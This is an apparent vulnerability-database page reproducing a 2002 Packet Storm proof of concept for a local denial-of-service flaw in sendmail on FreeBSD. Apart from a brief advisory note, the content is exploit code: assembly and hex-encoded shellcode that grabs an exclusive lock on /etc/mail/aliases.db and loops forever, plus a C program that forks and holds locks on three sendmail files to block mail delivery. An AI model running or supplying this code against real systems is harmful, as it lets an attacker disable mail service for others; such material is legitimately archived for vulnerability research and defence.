Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

sendmail-flock-sploit.txt

🗓️ 25 May 2002 00:00:00Reported by ZillionType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

Denial of service vulnerability in sendmail with proof of concept code provided.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`A problem has been identified in sendmail that can result in a denial of   
service attack. Attached is proof of concept code for this issue.   
  
http://www.sendmail.org/LockingAdvisory.txt   
  
have a safe Memorial Day folks.   
  
-KF   
  
;   
; Safemode.org, written by zillion 2002/05/24   
; http://www.snosoft.com : [email protected]   
; http://www.sendmail.org/LockingAdvisory.txt   
;   
  
BITS 32   
  
jmp short callit   
  
doit:   
  
pop esi   
xor eax,eax   
mov [esi + 20],al   
push eax   
push esi   
mov al,5   
push eax   
int 0x80   
  
push byte 0x2   
push eax   
mov al,131   
push eax   
int 0x80   
  
; Where going to stay forever ;-)   
  
sub cl,0x3   
l00p:   
js l00p   
  
callit:   
call doit   
  
db '/etc/mail/aliases.db'   
  
/*   
  
FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db   
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)   
  
More info: http://www.sendmail.org/LockingAdvisory.txt   
  
*/   
  
char shellcode[] =   
"\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"   
"\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"   
"\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"   
"\x69\x61\x73\x65\x73\x2e\x64\x62";   
  
int main()   
{   
  
int *ret;   
ret = (int *)&ret + 2;   
(*ret) = (int)shellcode;   
}   
  
#include <fcntl.h>   
#include <unistd.h>   
  
/*   
  
Stupid piece of code to test the sendmail lock vulnerability on   
FreeBSD. Run this and try sendmail -t on FreeBSD for example.   
  
More info: http://www.sendmail.org/LockingAdvisory.txt   
  
zillion (at safemode.org && snosoft.com)   
http://www.safemode.org   
http://www.snosoft.com   
  
*/   
  
int main() {   
  
if(fork() == 0) {   
  
char *lock1 = "/etc/mail/aliases";   
char *lock2 = "/etc/mail/aliases.db";   
char *lock3 = "/var/log/sendmail.st";   
  
int fd;   
fd = open(lock1,O_RDONLY);   
flock(fd,0x02);   
  
fd = open(lock2,O_RDONLY);   
flock(fd,0x02);   
  
fd = open(lock3,O_RDONLY);   
flock(fd,0x02);   
  
/* We are here to stay! */   
  
for(;;) {}   
  
}   
}   
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
25 May 2002 00:00Current
7.4High risk
Vulners AI Score7.4
denial of servicesendmail vulnerabilityproof of conceptfreebsdlock file.
17
.json
Report